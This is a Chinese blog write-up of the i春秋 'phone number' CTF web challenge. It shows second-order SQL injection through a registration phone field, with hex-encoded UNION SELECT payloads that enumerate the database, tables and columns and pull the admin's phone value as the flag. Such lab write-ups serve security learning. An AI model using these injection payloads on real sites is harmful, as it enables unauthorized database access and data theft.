i春秋 WEB phone number

最新推荐文章于 2020-07-03 15:49:34 发布
最新推荐文章于 2020-07-03 15:49:34 发布
阅读量698 收藏
点赞数 1
分类专栏: CTF题 一天一道CTF i春秋CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42967398/article/details/92831110
版权
CTF题 同时被 3 个专栏收录
115 篇文章 15 订阅
订阅专栏
一天一道CTF
52 篇文章 6 订阅
订阅专栏
i春秋CTF
21 篇文章 2 订阅
订阅专栏

i春秋 WEB phone number

一天一道CTF题目,能多不能少

打开网页是一个登陆页面,还能够注册,注册一个账号登陆进去,发现登录名和电话号码有回显:
在这里插入图片描述
点击check按钮,发现会查询你的电话号码~~
在这里插入图片描述
毕竟题目也是提示电话号码嘛!!
想到是不是二次注入~
重新注册的时候发现提示电话号码必须是字符:
在这里插入图片描述
既然只能传入数字,那么其他进制的数字能行吗?
尝试16进制,成功,啊哈哈哈哈哈哈
由于电话号码是数字,就不需要引号啦
构造一下语句,查字段:
在这里插入图片描述
发现电话号码只能输入11的长度,直接改客户端代码
进去后发现:
在这里插入图片描述
点击check得到:
在这里插入图片描述
确定可能真的存在注入,,,,而且字段还不是五个
继续注册,继续查,,,
在这里插入图片描述在这里插入图片描述
确定只有一个字段,坑的一批~
这就好办了,爆数据库:1 and 1=2 union select database()
16进制:3120616E6420313D3220756E696F6E2073656C6563742064617461626173652829
在这里插入图片描述
在这里插入图片描述
得到数据库webdb
继续爆表名:1 and 1=2 union select (select group_concat(table_name) from information_schema.tables where table_schema=database())
16进制:3120616E6420313D322020756E696F6E2073656C65637420202873656C6563742067726F75705F636F6E636174287461626C655F6E616D65292066726F6D20696E666F726D6174696F6E5F736368656D612E7461626C6573207768657265207461626C655F736368656D613D6461746162617365282929
在这里插入图片描述
在这里插入图片描述
得到只有一个表名为user
继续爆列名:1 and 1=2 union select (select group_concat(column_name) from information_schema.columns where table_name="user")
16进制:3120616E6420313D3220756E696F6E2073656C656374202873656C6563742067726F75705F636F6E63617428636F6C756D6E5F6E616D65292066726F6D20696E666F726D6174696F6E5F736368656D612E636F6C756D6E73207768657265207461626C655F6E616D653D22757365722229
在这里插入图片描述
在这里插入图片描述
查看这两个字段里面的内容:1 and 1=2 union select (select group_concat(User) from user)
16进制:3120616E6420313D3220756E696F6E2073656C656374202873656C6563742067726F75705F636F6E6361742855736572292066726F6D207573657229
不过一直是db error
按道理来说没毛病啊!!!
最后,突然发现页面有个注释!!!!:
在这里插入图片描述
编码有问题,放到notepad++发现:
在这里插入图片描述
admin???电话??
难道不是查看admin的密码吗,为什么又查看不了?
后来看了别人WP才知道,,,,,,
不需要gtoup_concat()直接爆列名就可以了~~
构造:1 and 1=2 union select column_name from information_schema.columns where table_name="user"
16进制:3120616E6420313D3220756E696F6E2073656C65637420636F6C756D6E5F6E616D652066726F6D20696E666F726D6174696F6E5F736368656D612E636F6C756D6E73207768657265207461626C655F6E616D653D227573657222
在这里插入图片描述
在这里插入图片描述
没错,有个phone,还有username,肯定是admin的phone里面,,,
执行语句:1 and 1=2 union select phone from user where username="admin"
16进制:3120616E6420313D3220756E696F6E2073656C6563742070686F6E652066726F6D207573657220776865726520757365726E616D653D2261646D696E22
在这里插入图片描述
在这里插入图片描述
get flag:flag{6dd303b0-8fce-2396-9ad8-d9f7a72f84b0}

说实在,还是对group_concat不起作用有点不理解
难道是因为只有一字段的原因???
怀疑自己写错语句了
自己又去查看了一些关于group_concat函数的使用
构造:1 and 1=2 union select group_concat(User,0x3a,Password) from user
还是没得用,头皮发麻,,,,,,,,
最后自己想了一下,是不是group_concat有长度限制??
百度了一下,找到:
在这里插入图片描述
可能这就是原因了吧~~
真滴是坑!!!

A_dmins
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phonenumber:PHP的电话号码库
05-04
它提供了等效的功能,但实现方面存在以下差异: PhoneNumber是一个不可变的类; 可以安全地传递它,而不必担心更改它的风险; PhoneNumber不仅是一个数据容器,还提供了解析,格式化和验证电话号码的所有方法; 它...
awesome-phonenumber:Google的libphonenumber与闭包编译器预编译
05-12
在所有使用Google的libphonenumber的电话号码库中,只有一个, google-libphonenumber (2.0.0)和node-phonenumber (0.2.2)具有良好的README(带有示例)。 嵌入闭包编译器的其他库应该具有可
i春秋 phone number
g1ut_t0ny的博客
07-03 231
0x00思路 注册页面必有猫腻,于是随便注册一个账号进去,发现点击check可以查询到手机号相同的信息,肯定是连接到数据库的,所以推测是个数据库注入。 0x01步骤 1、尝试注册带有SQL语句查询的电话号,发现只能传入numbers,那我寻思十六进制的数字也是数字啊(露出哲学的微笑) 2、构造如下语句查询数据库(文末有进制转换的????,做的时候忘了截图嘤嘤嘤) emmmm发现只能上传11位数字,好尴尬,审查元素改一下 接着来SQL 1 and 1=2 union select database()
i春秋phone number
weixin_30701575的博客
09-04 256
点开题目是一个普普通通的登录注册界面,随便注册一个点进去有两个功能,一个是查看电话和你相同的用户,一个是登出。 点击查询就可以看到用户数 这里有访问数据库的操作应该,所以就应该用数据库注入来解题。 又通过检查源码发现在查询界面存在一个提示 不多说先记下来 再尝试注册含有注入语的电话 提示请输入数字。。。。 看来这里需要输入数字那我们就使用16进制数字(h...
i春秋-Web(一)
qwzf
09-02 1342
前言 做了几道i春秋Web题,所以总结一下。 Web1:爆破-1 题目提示:某六位变量。查看题目,发现是代码审计 <?php include "flag.php"; $a = @$_REQUEST['hello'];//以get或post传入hello,并赋值给`$a` if(!preg_match('/^\w*$/',$a )){//正则表达式^匹配一行的开头,$表示结束。\w表示匹...
i春秋 WEB SQL
A_dmin的博客
06-20 841
i春秋 WEB SQL 一天一道CTF题目,能多不能少 打开网页,发现有个id参数,而且有提示: 查看网页源代码,发现有sql语句显示: 直接抓包,发现and,or,order好像被过滤了, 使用/**/,发现还是不行: 经过尝试发现,可以使用<>绕过关键字过滤 经过尝试,得到有三个字段: 使用union查询,发现select也被过滤掉了,同理使用<> 发现2的位置...
i春秋WEB CTF 3
cbhjerry的博客
04-27 522
题11:Backdoor,tips:敏感文件泄漏! 解题:题目给出了提示“敏感文件泄漏”,于是用dirb扫一下: 存在git文件,用git_extract导出文件: 导出的文件如下: 查看几个文件内容,发现falg.php.bd049e文件提示flag在文件b4ckdo0r.php中: 但是访问网站并不存在b4ckdo0r.php, 考虑是否存在.b4ckdo0r.ph...
i春秋ctf---2017广东省强网杯---web---writeup
gclome的博客
11-14 572
broken 打开是这样的: 点击 file ,出现jsfuck代码, Jsfuck代码的执行方法: ①复制 ②打开firefox浏览器 ③按下F12 ④选择上方的控制台 ⑤在下方粘贴是jsfuck代码 ⑥按下回车即可运行 把jsfuck代码放到控制器里运行,按照代码表进行审计,发现有[]没有闭合,把最后的()删掉,加上 ] ,解析出 Array[…],点击打开即可得到flag。 who ...
CheckPhoneNumber.rar_check phone number
09-14
本程序可以生成指定城市的所有手机号码的号段,将号段生成在一个text文本文件中。
react-phone-number-input:国际电话号码输入的React组件
02-19
import 'react-phone-number-input/style.css'import PhoneInput from 'react-phone-number-input'function Example ( ) { // `value` will be the parsed phone number in E.164 format. // Example: "+121
iPhone OS编程指南
12-23
PhoneSDK为创建iPhone的本地应用程序提供必需的工具和资源。在用户的Home屏幕上,iPhone的本地应用程序表示为图标。它们和运行在Safari内部的web应用程序不同,在基于iPhoneOS的设备上,它们作为独立的执行程序来...
i春秋 WEB code
A_dmin的博客
06-10 1415
i春秋 WEB code 一天一道CTF题目,能多不能少 打开网页入目的是一张图,查看网页源代码,发现图片是base64的加密,可能存在文件读取,尝试读取index.php的文件,得到源码: <?php /** * Created by PhpStorm. * Date: 2015/11/16 * Time: 1:31 */ header('content-type:text/htm...
BUUCTF web WarmUp
热门推荐
A_dmin的博客
06-07 1万+
BUUCTF web WarmUp 一天一道CTF题目,能多不能少 打开页面,一个滑稽,查看源码,得到source.php,输入得到源码: <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { ...
XCTF MISC Reverse-it
A_dmin的博客
06-08 7040
XCTF MISC Reverse-it 一天一道CTF题目,能多不能少 下载文件,放入winhex,入眼的是一坨乱码!!! 看了看文件头9DFF,好像jpeg图片的文件尾FFD9,在滑到最后看了一下,看见: 反过来好像就是jpeg图片的文件头!!! 这不和上一个题一样吗? 直接用上一个题脚本跑,结果发现不对,突然发现,上一个和这一个略有不同,上次是文件内容逆序,这次是16进制逆序 直接copy...
BUUCTF Reverse 新年快乐(手工去壳)
A_dmin的博客
07-19 6159
BUUCTF Reverse 新年快乐(手工去壳) 一天一道CTF题目,能多不能少 下载文件用ida(32)打开,发现: 怎么可能才两个函数,猜测加了壳,直接查: 发现是UPX 0.89.6 - 1.02 / 1.05 - 2.90 -> Markus & Laszlo [Overlay]的壳? 就是UPX嘛,好像有什么直接脱壳的工具 但是好像可以手工去壳?在这里直接尝试手工去壳...
BUUCTF Reverse 不一样的flag
A_dmin的博客
07-18 6130
BUUCTF Reverse 不一样的flag 一天一道CTF题目,能多不能少 题目提示: 下载文件用IDA打开(32),直接查看主函数: int __cdecl main(int argc, const char **argv, const char **envp) { char v3; // [esp+17h] [ebp-35h] int v4; // [esp+30h] [ebp-...
XCTF MISC 我们的秘密是绿色的
A_dmin的博客
06-08 5502
XCTF MISC Reverse-it 我们的秘密是绿色的 一天一道CTF题目,能多不能少 下载文件,发现是一张图片,看名字绿色,我还是以为是啥lsb隐写啥的,结果啥都没发现 仔细看题目我们的秘密,刚好有一款工具就叫做Our secret: 用工具打开,发现要密码,,,各种尝试,green,GREEN啊,,,, 最后发现图片上的日历有些数字颜色是绿色的!!! 输入密码:040511121819...
BUUCTF Reverse helloword、findit
A_dmin的博客
07-23 5098
BUUCTF Reverse helloword、findithellowordfindit 一天一道CTF题目,能多不能少 记录一下这两道题,这两道题是安卓逆向的题目~ 第一次接触安卓逆向的题目~ helloword 题目意思如下: 下载APK文件,使用APKIDE打开,找到主函数: 啊~快乐的题目:flag{7631a988259a00816deda84afb29430a} findit ...
phoneNumber和purePhoneNumber
最新发布
07-28
phoneNumber 和 purePhoneNumber 是两个常用于电话号码的概念。 phoneNumber 是指完整的电话号码,包括国际区号、国家代码、地区/城市代码和用户号码。它可以包含各种字符,如加号、括号、短横线等,用于表示国际、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值